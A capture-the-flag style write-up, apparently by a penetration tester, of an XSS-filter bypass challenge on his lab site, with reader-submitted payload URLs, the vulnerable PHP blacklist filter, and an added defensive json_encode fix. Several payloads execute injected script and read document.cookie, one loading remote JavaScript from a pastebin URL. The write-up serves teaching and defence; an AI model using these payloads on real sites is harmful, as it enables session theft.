Hello
As you know, XSS bypass challenges usually depend on knowledge of JavaScript, a good analysis of the web application's behaviour, and creativity. As in all my other challenges, this one simulates a real-life case that I ran into during a penetration test. We will look at the source code to understand what the developer tried to do to fix the XSS vulnerability and what he/she missed.
If you haven't tried to bypass the challenge yet, please try it yourself first; you can reach it directly via http://lab.mehmetince.net/h4ckm3/xss-2/index.php. Then come back here and continue reading the rest of the post.
First Thing First
I want to share the names of those who successfully bypassed the challenge, along with their payloads.
@0x90kh4n
http://lab.mehmetince.net/h4ckm3/xss-2/index.php?ali=%3C/scscriptript%3E%3Cscscriptript%20src=http://pastebin.com/raw.php?i=JVzVmtGJ%3E%3C/scriscriptpt%3E
@y_arabaci
http://lab.mehmetince.net/h4ckm3/xss-1/index.php?ali=%27%3B+v1%3D%27al%27%3B+v2%3D%27ert%27%3B+window%5Bv1%2Bv2%5D%28document.cookie%29%3B%27
@prakharprased
http://lab.mehmetince.net/h4ckm3/xss-2/index.php?ali=%3C/scscriptript%3E%3Cinput%20onfocus=eval%28location.hash.slice%281%29%29;%20autofocus%3E#alert%28document.cookie%29
@ysr08
http://lab.mehmetince.net/h4ckm3/xss-2/index.php?ali=%3C/scscriptript%3E%3Cscscriptript%3Ealalertert(document.cookie)%3C/scriscriptpt%3E
@SammyKalintosh
http://lab.mehmetince.net/h4ckm3/xss-1/index.php?ali=Sammy+Kalintosh+was+here....+%40sammykalintosh
Source Code
<html xmlns="http://www.w3.org/1999/html" lang="UTF-8">
<head>
    <META http-equiv=content-type content=text/html;charset=iso-8859-9>
    <script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
    <script>
    $( document ).ready(function() {
        var LoadString = function(str){
            $('#content').text(str);
        }
        <?php
        setcookie('freedom_for', 'twitter!!!TURKIYE!');
        if(@$_REQUEST['ali']){
            $foo = addslashes($_REQUEST['ali']);
            $zararli = array('alert', 'confirm', 'write', 'img', 'svg', 'prompt','script');
            $foo = str_replace($zararli, '', strtolower($foo));
            echo "LoadString('".$foo."')";
        }
        ?>
    });
    </script>
</head>
<div style="text-align: center;">
    <h3>XSS - 2</h3>
    <h4>Target : alert document.cookie</h4>
    <h4>Please mention your solutions to @mmetince </h4>
    <div id="content">w8 input</div>
    <body>
        <form action="index.php" method="GET">
            <input type="text" name="ali" placeholder="XSS payload.">
            <input type="submit" value="Gonder"></input>
        </form>
    </body>
</div>
</html>
As you can see, there is something wrong with the PHP part of the source code. The first thing I want to mention is addslashes(). This function converts each single quote into a backslash followed by a single quote, which is the starting point for preventing inline-JavaScript XSS in this string context.
Hello'   # converted to Hello\'
Secondly, the point I want to emphasise concerns blacklisting specific HTML tags and function names. If you really want to detect HTML tags inside user input, you have to be careful. In this example, the most common tag and function names are removed from the user input via str_replace. To bypass this protection we will focus on how str_replace behaves: it makes a single pass over the string and does not re-scan its own output, so removing a blocked word can leave behind another copy of that same word. Please read the following traces to understand the payload.
#Input - 1
<script>alert(1)</script>
#Output - 1
<>alert(1)</>
#Input - 2
<scrSCRIPTipt>alert(1)</scrSCRIPTipt>
#Output - 2
<script>alert(1)</script>
(The traces isolate the tag name. Since alert is also in the blacklist, the real output of the challenge filter is <>(1)</> for the first input and <script>(1)</script> for the second; the surviving tag is what matters.)
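The following PHP is an added example, not the challenge's own code. It puts the challenge's filter (reproduced in a function I have named challengeFilter) next to two things a defender would want: a second-pass stability check that flags outputs the single-pass str_replace has left with a blocked token, and the actual fix, which stops trying to recognise dangerous words and instead emits the value as a properly encoded JavaScript string literal via json_encode with the JSON_HEX_* flags. The function names and the sample inputs are my own; the third sample is the write-up's Input-2.

```php
<?php
// Added example (not the challenge's own code): the challenge's blacklist
// filter next to a context-correct replacement for the LoadString('...') call.
// challengeFilter, filterIsStable and safeJsStringLiteral are assumed names.
declare(strict_types=1);

// The filter from the challenge, reproduced in a function so both approaches
// can be compared on the same input.
function challengeFilter(string $input): string
{
    $zararli = array('alert', 'confirm', 'write', 'img', 'svg', 'prompt', 'script');
    $foo = addslashes($input);
    return str_replace($zararli, '', strtolower($foo));
}

// Defensive check for any remove-on-match filter: if a second pass still
// changes the string, the first pass left (or reassembled) a blocked token.
// It catches the class of bypass shown in the write-up, but it is still a
// blacklist and is shown only to illustrate why the approach is fragile.
function filterIsStable(string $filtered): bool
{
    $zararli = array('alert', 'confirm', 'write', 'img', 'svg', 'prompt', 'script');
    return str_replace($zararli, '', $filtered) === $filtered;
}

// The fix: do not try to recognise dangerous words at all. The value lands
// inside a JavaScript string literal in an inline <script>, so emit exactly
// that: a JSON string with <, >, &, ' and " encoded as \uXXXX. The literal
// can then neither close the <script> element nor escape its quotes, and
// jQuery's .text() in LoadString() already renders it as plain text.
function safeJsStringLiteral(string $input): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_INVALID_UTF8_SUBSTITUTE;   // substitute flag needs PHP >= 7.2
    $json = json_encode($input, $flags);
    if ($json === false) {
        // json_encode fails only on encoding errors; never fall back to the raw value.
        return '""';
    }
    return $json;
}

// Constructed sample inputs. The second is a benign string that happens to
// contain a closing script tag and quotes; the third is the write-up's Input-2.
$samples = [
    "Hello O'Neil",
    "</script> <b>bold</b> & 'quoted'",
    "<scrSCRIPTipt>alert(1)</scrSCRIPTipt>",
];

foreach ($samples as $s) {
    $filtered = challengeFilter($s);
    printf("input    : %s\n", $s);
    printf("blacklist: %s  (stable after a 2nd pass: %s)\n",
           $filtered, filterIsStable($filtered) ? 'yes' : 'no');
    // This is the line the template should emit instead of echo "LoadString('".$foo."')";
    printf("encoded  : LoadString(%s);\n\n", safeJsStringLiteral($s));
}
```

Running it shows the third sample collapsing to a complete <script> tag under the blacklist and being reported as unstable, while safeJsStringLiteral() turns every sample into a quoted literal in which < and > appear only as \u003c and \u003e, so there is nothing left for the browser's HTML parser to act on.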
Results
To be honest, I like the solutions of @0x90kh4n and @prakharprased. Actually, I used exactly the same payload as 0x90kh4n.
http://lab.mehmetince.net/h4ckm3/xss-2/index.php?ali=</scscriptript><scscriptript src=http://pastebin.com/raw.php?i=JVzVmtGJ></scriscriptpt>
As you can see, the first step is closing the existing script element with </scscriptript> (which the filter turns into </script>) and reopening it via <scscriptript>. After that, load your remote JS file, which contains alert(document.cookie). Then close your script element with </scriscriptpt>. That's all.
In conclusion, I will keep preparing and posting new challenges based on what I experience during penetration tests. The next challenge will be about SQL injection.